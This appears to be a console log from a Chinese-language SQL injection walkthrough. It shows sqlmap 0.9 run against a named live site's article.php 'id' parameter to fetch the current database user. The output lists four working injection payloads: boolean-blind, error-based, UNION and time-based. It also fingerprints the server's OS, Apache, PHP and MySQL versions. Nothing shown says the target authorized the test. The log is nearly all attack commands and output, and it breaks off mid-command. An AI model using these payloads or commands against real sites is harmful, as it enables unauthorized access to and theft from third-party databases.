D:Python27sqlmap>sqlmap.py
-u http://www.wepost.com.hk/article.php?id=276
--db
ms "Mysql"
--current-user
/* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover
tool
[*] starting at: 16:53:54
[16:53:54] [INFO] using
'D:Python27sqlmapoutputwww.wepost.com.hksession' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session
file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0
HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type:
boolean-based blind
Title: AND
boolean-based blind - WHERE or HAVING clause
Payload:
id=276 AND 799=799
Type:
error-based
Title: MySQL
>= 5.0 AND error-based - WHERE or HAVING
clause
Payload:
id=276 AND (SELECT 8404 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0
END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY
x)a)
Type:
UNION query
Title: MySQL
UNION query (NULL) - 1 to 10 columns
Payload:
id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)
AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type:
AND/OR time-based blind
Title: MySQL
> 5.0.11 AND time-based blind
Payload:
id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:
[16:53:58] [INFO] Fetched data logged to text files under
'D:Python27sqlmapou
tputwww.wepost.com.hk'
[*] shutting down at: 16:53:58
D:Python27sqlmap>sqlmap.py -u http://www.wepost.com.hk/arti